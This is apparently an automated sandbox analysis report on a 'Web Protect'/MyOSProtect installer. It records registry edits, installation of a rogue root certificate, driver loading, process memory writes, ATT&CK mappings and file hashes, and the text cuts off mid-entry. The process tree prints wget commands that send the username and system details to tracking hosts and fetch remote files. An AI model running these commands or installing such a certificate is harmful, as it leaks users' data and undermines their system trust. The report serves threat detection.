Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1A2A195A-A0F9-4006-AF02-3F05EEFDE792}	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataContainer\CurVer\ = "MyOSProtectLib.DataContainer.1"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E3F16E3B-4C44-445B-8854-EB76DC059891}\ = "IDataTable"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C1F5E799-B218-4C32-B189-3C389BA140BB}\ = "IReadOnlyManager"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F60C9408-3110-4C98-A139-ABE1EE1111DD}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.ReadOnlyManager\CurVer\ = "MyOSProtectLib.ReadOnlyManager.1"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.LSPLogic.1\CLSID	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1A2A195A-A0F9-4006-AF02-3F05EEFDE792}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\FF1F6CD8315EBB20B9378CA40C6AB5B5EF4B239A	MyOSProtect.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\FF1F6CD8315EBB20B9378CA40C6AB5B5EF4B239A\Blob = 030000000100000014000000ff1f6cd8315ebb20b9378ca40c6ab5b5ef4b239a20000000010000009d0300003082039930820302a0030201020209009b11afd3c5b09e7b300d06092a864886f70d0101050500308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e63301e170d3134303130373135353535335a170d3334303130323135353535335a308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e6330819f300d06092a864886f70d010101050003818d0030818902818100bf42c6c055d932b18592356bfd7679f6380d06fa77f2b6836ceb1a9c29533578e7a9e4bda4e335feb769a9a07f3200dd533916e0027d55e6cbf4a5a5fc3d1933028e0cf92f7edbe004f33312d1c8ca0291835e656e09f4d4c4de26d43aefca5f32620377a238d0a09e6f744817d0e6d7d02b73424529cb0f329e0916fe68cfa90203010001a381f83081f5300c0603551d13040530030101ff301d0603551d0e04160414cd753bef8d688ff1b7081da39b059a180edfdf003081c50603551d230481bd3081ba8014cd753bef8d688ff1b7081da39b059a180edfdf00a18196a48193308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e638209009b11afd3c5b09e7b300d06092a864886f70d0101050500038181000b5f14595f51ae3008b76990c5564777cb310a0b009cdafa0ea3cdc532fd1b2da83490d47f28e498c83900b3128e086ff4cbf0483b8002f54de75855eb9a6ca160e83853539022248d537f4485d4a492ac151e4d0a1809a8a976113ed37d707f9392285187307aa11ea46f4377003c862a96fb39c364c7f370d426a4ad0c733a	MyOSProtect.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3028	RegisterMyOSProtect.exe
3028	RegisterMyOSProtect.exe
1120	RegisterMyOSProtect64.exe
1120	RegisterMyOSProtect64.exe
3712	MyOSProtect.exe
3712	MyOSProtect.exe
3712	MyOSProtect.exe
3712	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
2508	MyOSProtect.exe
2508	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe
2056	MyOSProtect.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
3028	RegisterMyOSProtect.exe
656	Process not Found
1120	RegisterMyOSProtect64.exe
656	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeLoadDriverPrivilege	3028	RegisterMyOSProtect.exe
Token: SeLoadDriverPrivilege	1120	RegisterMyOSProtect64.exe
Token: SeDebugPrivilege	2508	MyOSProtect.exe
Token: SeDebugPrivilege	2056	MyOSProtect.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 812 wrote to memory of 1988	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	79
PID 812 wrote to memory of 1988	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	79
PID 812 wrote to memory of 1988	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	79
PID 1988 wrote to memory of 1604	1988	precollect.exe	80
PID 1988 wrote to memory of 1604	1988	precollect.exe	80
PID 1988 wrote to memory of 1604	1988	precollect.exe	80
PID 812 wrote to memory of 5016	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	82
PID 812 wrote to memory of 5016	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	82
PID 812 wrote to memory of 5016	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	82
PID 812 wrote to memory of 4952	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	83
PID 812 wrote to memory of 4952	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	83
PID 812 wrote to memory of 4952	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	83
PID 812 wrote to memory of 1332	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	86
PID 812 wrote to memory of 1332	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	86
PID 812 wrote to memory of 1332	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	86
PID 812 wrote to memory of 4108	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	88
PID 812 wrote to memory of 4108	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	88
PID 812 wrote to memory of 4108	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	88
PID 812 wrote to memory of 3592	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	90
PID 812 wrote to memory of 3592	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	90
PID 812 wrote to memory of 3592	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	90
PID 812 wrote to memory of 4496	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	92
PID 812 wrote to memory of 4496	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	92
PID 812 wrote to memory of 4496	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	92
PID 4496 wrote to memory of 3436	4496	monitor.exe	93
PID 4496 wrote to memory of 3436	4496	monitor.exe	93
PID 4496 wrote to memory of 3436	4496	monitor.exe	93
PID 4496 wrote to memory of 4596	4496	monitor.exe	96
PID 4496 wrote to memory of 4596	4496	monitor.exe	96
PID 4496 wrote to memory of 4596	4496	monitor.exe	96
PID 812 wrote to memory of 3028	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	97
PID 812 wrote to memory of 3028	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	97
PID 812 wrote to memory of 3028	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	97
PID 812 wrote to memory of 1120	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	99
PID 812 wrote to memory of 1120	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	99
PID 812 wrote to memory of 3712	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	101
PID 812 wrote to memory of 3712	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	101
PID 812 wrote to memory of 3712	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	101
PID 812 wrote to memory of 1552	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	103
PID 812 wrote to memory of 1552	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	103
PID 812 wrote to memory of 1552	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	103
PID 812 wrote to memory of 4416	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	106
PID 812 wrote to memory of 4416	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	106
PID 812 wrote to memory of 4416	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	106
PID 812 wrote to memory of 212	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	111
PID 812 wrote to memory of 212	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	111
PID 812 wrote to memory of 212	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	111
PID 812 wrote to memory of 3228	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	114
PID 812 wrote to memory of 3228	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	114
PID 812 wrote to memory of 3228	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	114
PID 812 wrote to memory of 680	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	117
PID 812 wrote to memory of 680	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	117
PID 812 wrote to memory of 680	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	117
PID 812 wrote to memory of 3216	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	119
PID 812 wrote to memory of 3216	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	119
PID 812 wrote to memory of 3216	812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe	119
PID 5016 wrote to memory of 1188	5016	postcollect.exe	124
PID 5016 wrote to memory of 1188	5016	postcollect.exe	124
PID 5016 wrote to memory of 1188	5016	postcollect.exe	124

C:\Users\Admin\AppData\Local\Temp\ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
"C:\Users\Admin\AppData\Local\Temp\ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:812
- C:\Program Files (x86)\Web Protect\precollect.exe
  "C:\Program Files (x86)\Web Protect\precollect.exe" /iid {00000} /nid adk
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Program Files (x86)\Web Protect\wget.exe
    "C:\Program Files (x86)\Web Protect\wget.exe" -q -O "tmpfile" "http://tk.software-net.org/prepost/pre.php?iid={00000}&nid=adk&aid=&winver=&bit=64&uaccount=Admin&pcpIsInstalled=&pcpIsOtherInstalled=&pcpIsOtherDetails=&pcwatchExists=0"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1604
- C:\Program Files (x86)\Web Protect\postcollect.exe
  "C:\Program Files (x86)\Web Protect\postcollect.exe" /iid {C78E83A9-4D31-4B8F-9456-76D7CEA5B5B1} /nid adk
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Program Files (x86)\Web Protect\wget.exe
    "C:\Program Files (x86)\Web Protect\wget.exe" -q -O "tmpfile" "http://track.trkinstall.com/prepost/post.php?iid={C78E83A9-4D31-4B8F-9456-76D7CEA5B5B1}&nid=adk&aid=&winver=&bit=64&uaccount=Admin&pcpIsInstalled=&pcpIsOtherInstalled=&pcpIsOtherDetails=&pcwatchExists=0&pcpRunning=0"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1188
- C:\Windows\SysWOW64\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4952
- C:\Program Files (x86)\Web Protect\wget.exe
  "C:\Program Files (x86)\Web Protect\wget.exe" -q -O "jsurl.txt" "http://cdn.traqingsvc.com/webprotect/V4/adk/js_url.data"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1332
- C:\Program Files (x86)\Web Protect\wget.exe
  "C:\Program Files (x86)\Web Protect\wget.exe" -q -O "idate.txt" "http://track.traqingsvc.com/installdate.php"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:4108
- C:\Program Files (x86)\Web Protect\wget.exe
  "C:\Program Files (x86)\Web Protect\wget.exe" -q -O "itime.txt" "http://track.traqingsvc.com/installtimestamp.php"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3592
- C:\monitor.exe
  C:\monitor.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Windows\SysWOW64\sc.exe
    sc start "PCProtect"
    3⤵
    - Launches sc.exe
    PID:3436
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4596
- C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe
  "C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe" -b -d MyOSProtect.dll
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  PID:3028
- C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe
  "C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe" -b -d MyOSProtect64.dll
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  PID:1120
- C:\Program Files (x86)\Web Protect\MyOSProtect.exe
  "C:\Program Files (x86)\Web Protect\MyOSProtect.exe" /Service
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3712
- C:\Windows\SysWOW64\sc.exe
  sc start "MyOSProtect"
  2⤵
  - Launches sc.exe
  PID:1552
- C:\Program Files (x86)\Web Protect\DirectControl.exe
  "C:\Program Files (x86)\Web Protect\DirectControl.exe" -x64
  2⤵
  - Executes dropped EXE
  PID:4416
- C:\Windows\SysWOW64\sc.exe
  sc stop "MyOSProtect"
  2⤵
  - Launches sc.exe
  PID:212
- C:\Windows\SysWOW64\sc.exe
  sc start "MyOSProtect"
  2⤵
  - Launches sc.exe
  PID:3228
- C:\Program Files (x86)\Web Protect\wget.exe
  "C:\Program Files (x86)\Web Protect\wget.exe" -q --post-data=type=install&i={C78E83A9-4D31-4B8F-9456-76D7CEA5B5B1}&nid=adk&aid=0&browser=XX&installed=0&testgroup=&version=210&isAdministrator=&isVM=1 -O "status2.txt" "http://track.traqingsvc.com/diagnose.php"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:680
- C:\Program Files (x86)\Web Protect\wget.exe
  "C:\Program Files (x86)\Web Protect\wget.exe" -q --post-data=type=install&i={C78E83A9-4D31-4B8F-9456-76D7CEA5B5B1}&nid=adk&aid=0&browser=XX&installed=0&testgroup=&version=210&isVM=1 -O "status3.txt" "http://track3.traqingsvc.com/diagnose_redundant.php"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3216

C:\Program Files (x86)\Web Protect\MyOSProtect.exe
"C:\Program Files (x86)\Web Protect\MyOSProtect.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Program Files (x86)\Web Protect\MyOSProtect.exe
"C:\Program Files (x86)\Web Protect\MyOSProtect.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Web Protect\postcollect.exe

Filesize
47KB

MD5
0244d0b696aa1a3bf755ba2e9356b1d5

SHA1
6a323c7f17097ec3a1c50ff05062a882dd53fda8

SHA256
15467b1af80077c660e2efa623265f9c885970f84f0e59e589ea3d55fc04f321

SHA512
df811c1d7070c0789ac373062b9110f768f0ed898ed216d624be04ac77e827fcc289cc088bc8ca534fd1c4113e61e2b369e5d0da0d99c77dc8a020ab186d549f

Download Submit
C:\Program Files (x86)\Web Protect\postcollect.exe

Filesize
47KB

MD5
0244d0b696aa1a3bf755ba2e9356b1d5

SHA1
6a323c7f17097ec3a1c50ff05062a882dd53fda8

SHA256
15467b1af80077c660e2efa623265f9c885970f84f0e59e589ea3d55fc04f321

SHA512
df811c1d7070c0789ac373062b9110f768f0ed898ed216d624be04ac77e827fcc289cc088bc8ca534fd1c4113e61e2b369e5d0da0d99c77dc8a020ab186d549f

Download Submit
C:\Program Files (x86)\Web Protect\precollect.exe

Filesize
45KB

MD5
c3d87d947ba5e16351b53db2ee2b20c1

SHA1
4d8fb40be5afb236c930699ebbd3c74519a13574

SHA256
12d45e12dcfc46e119ad582d3cf00d24beaeb736c69de4fa646fcf66851509fa

SHA512
23650ff8effdf19ce061c16555e1c1ca83eb194ec28450a844c81e78603cd6b846ca3db04c90285383e03ca27cc457d819cfa4c0f296e00e2709d555eb28f937

Download Submit
C:\Program Files (x86)\Web Protect\precollect.exe

Filesize
45KB

MD5
c3d87d947ba5e16351b53db2ee2b20c1

SHA1
4d8fb40be5afb236c930699ebbd3c74519a13574

SHA256
12d45e12dcfc46e119ad582d3cf00d24beaeb736c69de4fa646fcf66851509fa

SHA512
23650ff8effdf19ce061c16555e1c1ca83eb194ec28450a844c81e78603cd6b846ca3db04c90285383e03ca27cc457d819cfa4c0f296e00e2709d555eb28f937

Download Submit
C:\Program Files (x86)\Web Protect\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Program Files (x86)\Web Protect\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Program Files (x86)\Web Protect\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Program Files (x86)\Web Protect\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Program Files (x86)\Web Protect\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\System.dll

Filesize
11KB

MD5
c17103ae9072a06da581dec998343fc1

SHA1
b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

SHA256
dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

SHA512
d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\UserInfo.dll

Filesize
4KB

MD5
7579ade7ae1747a31960a228ce02e666

SHA1
8ec8571a296737e819dcf86353a43fcf8ec63351

SHA256
564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5

SHA512
a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\UserInfo.dll

Filesize
4KB

MD5
7579ade7ae1747a31960a228ce02e666

SHA1
8ec8571a296737e819dcf86353a43fcf8ec63351

SHA256
564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5

SHA512
a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshA7DE.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsmA761.tmp\System.dll

Filesize
11KB

MD5
c17103ae9072a06da581dec998343fc1

SHA1
b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

SHA256
dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

SHA512
d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsmA761.tmp\System.dll

Filesize
11KB

MD5
c17103ae9072a06da581dec998343fc1

SHA1
